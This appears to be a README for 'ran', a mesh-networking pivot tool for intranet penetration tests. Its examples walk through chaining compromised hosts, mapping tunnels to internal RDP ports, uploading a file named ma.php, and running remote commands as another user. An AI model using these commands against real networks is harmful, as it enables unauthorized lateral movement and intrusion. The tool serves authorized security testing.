Cloud native mesh networking, now introduced to intranet pentests.
Pre-compiled binaries could be found on GitHub Releases.
For Mainland Chinese users, please use the Coding.net mirror.
- Download
go>=1.18
, - Clone this repository and
make
to build the binaries from source.
Learn usages through an example.
Assuming:
- you are using
192.168.137.1/24
, - you have taken down
192.168.137.101/24
, 192.168.137.101/24
also has address192.168.56.101/24
,- you have taken down
192.168.56.102/24
too, 192.168.56.102
also has address10.103.10.102/24
.- now you want to break into
10.103.10.0/24
through192.168.56.102/24
Setup mesh network on the entrypoint:
# Exec on 192.168.137.101
./ran -l "rantp://0.0.0.0:10080"
Connect an individual endpoint to the mesh network:
# Exec on 192.168.137.102
./ran -u "rantp://192.168.137.101:10080"
Or ALTERNATIVELY, connect from entrypoint to that individual endpoint:
# Exec on 192.168.137.102
./ran -l "rantp://0.0.0.0:10080"
# Exec on the interactive shell later. druB is node name of `101`.
probenode durB 192.168.137.102:10080
Access the mesh endpoint, interactively:
# Exec on 192.168.137.1
./ran -u "rantp://192.168.137.101:10080" -i
# Exec query without being interactive
./ran -u "rantp://192.168.137.101:10080" -c "listnodes"
Show nodes on the mesh network:
listnodes
Create tunnel mapping:
# Aagd is node name of `192.168.56.102`
addmapping zero:192.168.137.1:4321 Aagd:10.103.10.34:3389
# if ip address is 0.0.0.0 or same as node ip,
# or specified with `--listen` flag, the mapping will be reversal
addmapping zero:192.168.137.1:10050 Aagd:10.103.10.102:10050
addmapping zero:192.168.137.1:10050 Aagd::10050 --listen
Upload and exec command on remote node:
# get node information
info Aagd
# Upload or download files with syncfile
syncfile /tmp/ma.php Aagd:/tmp/ma.php
# Will execute with environment loaded non-login shell as "arthur"
execute "whoami" --sudo "arthur" --password "123456"
Use [fe80::wtf]
if you want to conquer over IPv6.
By default, ran use ranTP as protocol for control plane, and direct L4 routing for data plane.
Alternatively you can use http to wrap up both control plane or data plane.
socks5, http/2, https, QUIC,DNS,WS+TLS will be supported in the future.
This framework may be robust enough to serve as a L4 service mesh in the future.